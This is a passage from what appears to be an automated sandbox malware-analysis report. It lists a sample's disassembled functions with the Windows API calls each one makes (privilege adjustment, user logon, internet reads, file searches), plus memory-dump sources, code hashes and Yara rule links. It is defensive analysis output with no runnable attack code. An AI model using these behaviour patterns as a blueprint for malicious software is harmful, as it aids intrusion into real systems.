                                                                                                                    APIs
                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0032180A,00000000), ref: 003223E1
                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00322418
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 599397726-0
                                                                                                                    • Opcode ID: 4e042bd4f4305aa9689ed0e9e658bfe70b897da4da5e14ac53239c949b20606e
                                                                                                                    • Instruction ID: 9db1a9c74dbd5661046cdf74c6276e5480cd21f55cc83d3c86b0f5eaf6719f7d
                                                                                                                    • Opcode Fuzzy Hash: 4e042bd4f4305aa9689ed0e9e658bfe70b897da4da5e14ac53239c949b20606e
                                                                                                                    • Instruction Fuzzy Hash: 0A41F675904219BFEB12DE96EC85FBBB7BCEB40314F10406AFA01A6241DA759E419A60
                                                                                                                    Function 0031B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0031B343
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0031B39D
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0031B3EA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1682464887-0
                                                                                                                    • Opcode ID: b1c0de9bff087e972a13333a44214a591d1fa79eda21a9dca46e00078e2488ef
                                                                                                                    • Instruction ID: 47c4cbcaa46e1c3652de47339d9b6bfceacb0e2fcce778a7569d2562a8cc8cf7
                                                                                                                    • Opcode Fuzzy Hash: b1c0de9bff087e972a13333a44214a591d1fa79eda21a9dca46e00078e2488ef
                                                                                                                    • Instruction Fuzzy Hash: F1215E35A00518EFCB01EFA5D881AEDBBB8FF49310F1480AAE905AB351CB319965CF50
                                                                                                                    Function 003087E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                      • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0030882B
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00308858
                                                                                                                    • GetLastError.KERNEL32 ref: 00308865
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1922334811-0
                                                                                                                    • Opcode ID: 984aeafa57afdf3a819c61c13a1fa7f9e2d1780376837fc6cd75d9719cac3e24
                                                                                                                    • Instruction ID: 369785a5e8db4204feac17ca32acb8ddedd04f172601662952eda91a64cc6585
                                                                                                                    • Opcode Fuzzy Hash: 984aeafa57afdf3a819c61c13a1fa7f9e2d1780376837fc6cd75d9719cac3e24
                                                                                                                    • Instruction Fuzzy Hash: 3F116AB2914204AFE719DFA4DCC5D6BB7BDFB44710B60C52EE49697651EA30AC408B60
                                                                                                                    Function 0030874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00308774
                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0030878B
                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0030879B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: ffafc52fb799936b0b985a33512ea87cd645a3accdc5c43f035d65d88e922628
                                                                                                                    • Instruction ID: 57df715b1e563f907da6e95d4244c91062e34087576baab051463afe71d15286
                                                                                                                    • Opcode Fuzzy Hash: ffafc52fb799936b0b985a33512ea87cd645a3accdc5c43f035d65d88e922628
                                                                                                                    • Instruction Fuzzy Hash: 12F03775E1120CBFDB04DFE49D89ABEBBBCEF08301F5044A9A905E2181E6716A048B50
                                                                                                                    Function 00318889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __time64.LIBCMT ref: 0031889B
                                                                                                                      • Part of subcall function 002D520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00318F6E,00000000,?,?,?,?,0031911F,00000000,?), ref: 002D5213
                                                                                                                      • Part of subcall function 002D520A: __aulldiv.LIBCMT ref: 002D5233
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                    • String ID: 0e7
                                                                                                                    • API String ID: 2893107130-2065499759
                                                                                                                    • Opcode ID: 59e8db6542342fbf55b0e44d8f2710b4e72ee9e1fb6065adc004315b698284dd
                                                                                                                    • Instruction ID: 93b7e418a2980e9bd53c2a4060167c900e3038d2dfc17d84a106c77f5c0394df
                                                                                                                    • Opcode Fuzzy Hash: 59e8db6542342fbf55b0e44d8f2710b4e72ee9e1fb6065adc004315b698284dd
                                                                                                                    • Instruction Fuzzy Hash: 4A21E732635510CBC32ACF29D451A91B3E5EFA9320F688E2CD0F9CB2C0CA34B945DB54
                                                                                                                    Function 0031C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0031C6FB
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031C72B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: 4ef2f50a9fd8828e2acf43ab1c7596d0e0962df58963681c15774cd513efe307
                                                                                                                    • Instruction ID: a12c04e54f555783fd6c6719715aa0ca03e6d3a841d31ea683de23482176b892
                                                                                                                    • Opcode Fuzzy Hash: 4ef2f50a9fd8828e2acf43ab1c7596d0e0962df58963681c15774cd513efe307
                                                                                                                    • Instruction Fuzzy Hash: AD11A1766102009FDB10EF29D885A6AF7E8FF89364F00851DF9A9C72A1DB70AC11CF81
                                                                                                                    Function 0031A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00329468,?,0033FB84,?), ref: 0031A097
                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00329468,?,0033FB84,?), ref: 0031A0A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 86b0320dd3c5c7bbda274b7afc97bfb66355efdadcac930c74d0a0a181f72094
                                                                                                                    • Instruction ID: e389000cd692a97882d799e99670361d6c55c47e7533e9803a4c9e9561002639
                                                                                                                    • Opcode Fuzzy Hash: 86b0320dd3c5c7bbda274b7afc97bfb66355efdadcac930c74d0a0a181f72094
                                                                                                                    • Instruction Fuzzy Hash: 15F0E23550522DABDB229FA4CC88FEA736CBF0C362F004165F808D2181C6309954CBA1
                                                                                                                    Function 003081CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00308309), ref: 003081E0
                                                                                                                    • CloseHandle.KERNEL32(?,?,00308309), ref: 003081F2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    • Opcode ID: fb1b7c7fc45cac51d1f276d213ab04be2f36749e0f9827e7917c2519423906f5
                                                                                                                    • Instruction ID: 6f5445e4b999367e20e962ca51977a2e7405d63011eb63eb997f307699914e19
                                                                                                                    • Opcode Fuzzy Hash: fb1b7c7fc45cac51d1f276d213ab04be2f36749e0f9827e7917c2519423906f5
                                                                                                                    • Instruction Fuzzy Hash: A7E0E671011510AFE7262B74EC45E7777EDEF04310F14C82EF49584470DB615CA1DB10
                                                                                                                    Function 002DA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002D8D57,?,?,?,00000001), ref: 002DA15A
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002DA163
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 50bae8e399822fe7cdc2f750ac920b66483313298984c57e87c8ca1ee72bbbbb
                                                                                                                    • Instruction ID: 2ad854581c62f698663a36b62aa31a19551c760a9f85d7e2a8d6db418fd93046
                                                                                                                    • Opcode Fuzzy Hash: 50bae8e399822fe7cdc2f750ac920b66483313298984c57e87c8ca1ee72bbbbb
                                                                                                                    • Instruction Fuzzy Hash: E3B09235454208AFCA022B91EC49B8A3F6CEB45BB2F804020F60D85060CB6254508A91
                                                                                                                    Function 002DF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4bb56866162204efcfa6835379a01b1fb9672ebc75b55a849ca833d2f57fa2cd
                                                                                                                    • Instruction ID: e89910ffaa2cae736eb7c43cba25df076bc1d403f8d81cb363afcf0f08a0a186
                                                                                                                    • Opcode Fuzzy Hash: 4bb56866162204efcfa6835379a01b1fb9672ebc75b55a849ca833d2f57fa2cd
                                                                                                                    • Instruction Fuzzy Hash: 5632F125D39F414DD7639A34D932326A24CAFB73C4F15D737E81AB9AA6EF28D8834104
                                                                                                                    Function 002E242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f11f595070ad42e6913cc9706edb1e207a1cf6e222fbcc71f7c13d742ac579c0
                                                                                                                    • Instruction ID: 09602bdf30d45eb30b1e2cd526145bef3a89c154ed070580ed83eb729808cbbc
                                                                                                                    • Opcode Fuzzy Hash: f11f595070ad42e6913cc9706edb1e207a1cf6e222fbcc71f7c13d742ac579c0
                                                                                                                    • Instruction Fuzzy Hash: F2B1E124E6AF414DD3239A398831336B65CAFBB2D5F91D71BFC2678E22FB2195834141
                                                                                                                    Function 00314C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00314C4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    • Opcode ID: ba1391d85a3487288b9f1a0e701d2d1aa970b6cb9cc2431eed910cd05204ef40
                                                                                                                    • Instruction ID: bf3f8766dfe6861522a826e6ba3852aa31e0a038745eb73d96285a0742b4df44
                                                                                                                    • Opcode Fuzzy Hash: ba1391d85a3487288b9f1a0e701d2d1aa970b6cb9cc2431eed910cd05204ef40
                                                                                                                    • Instruction Fuzzy Hash: 6DD05EA116520938FC1E0720AE0FFFB010DE308792FD9814971028A0C1EC805CC05070
                                                                                                                    Function 003087B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00308389), ref: 003087D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LogonUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1244722697-0
                                                                                                                    • Opcode ID: 9cbfea4c9d486d9b24c1f650519e7f9e684ed805390135369ffddd1643d6eddb
                                                                                                                    • Instruction ID: 7e8cffc4314bf0208a5ba84b45077ce49b78128ed2aecf75a0599bd3b81df12d
                                                                                                                    • Opcode Fuzzy Hash: 9cbfea4c9d486d9b24c1f650519e7f9e684ed805390135369ffddd1643d6eddb
                                                                                                                    • Instruction Fuzzy Hash: 44D05E3226450EAFEF018EA8DC01EBE3B69EB04B01F808111FE15C50A1C775D835AB60
                                                                                                                    Function 002DA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002DA12A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 03043a7410e53940a725b58533d84a20d40fb93638d3cd7ec20f3c1c6a6cfb03
                                                                                                                    • Instruction ID: 1296c07643a400fc1a766fef6e994c21e0e39c9232b124cae55da57f41e4ad31
                                                                                                                    • Opcode Fuzzy Hash: 03043a7410e53940a725b58533d84a20d40fb93638d3cd7ec20f3c1c6a6cfb03
                                                                                                                    • Instruction Fuzzy Hash: 86A0123000010CAB8A011B41EC044457F5CD6012A0F404020F40C41021873254104580
                                                                                                                    Function 002C8808 Relevance: .6, Instructions: 590COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0525651c50c03d6151377e6da7ba1d025736814f6de58aac02680e035b2ce035
                                                                                                                    • Instruction ID: b12b6a2fd16b7c57b23680118afe11a4ce03cfb393e53060b38469a58af43951
                                                                                                                    • Opcode Fuzzy Hash: 0525651c50c03d6151377e6da7ba1d025736814f6de58aac02680e035b2ce035
                                                                                                                    • Instruction Fuzzy Hash: 85224430624517CBDF2A8E28C4A4B7DB7A5FF01304F29C66ED9468B9D2DB709DA1CB41
                                                                                                                    Function 002D21C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                    • Instruction ID: 4e3e19bca9b13110ec72f11874b9b3ee3f6a45803d921c290c2fedf87be5dedf
                                                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
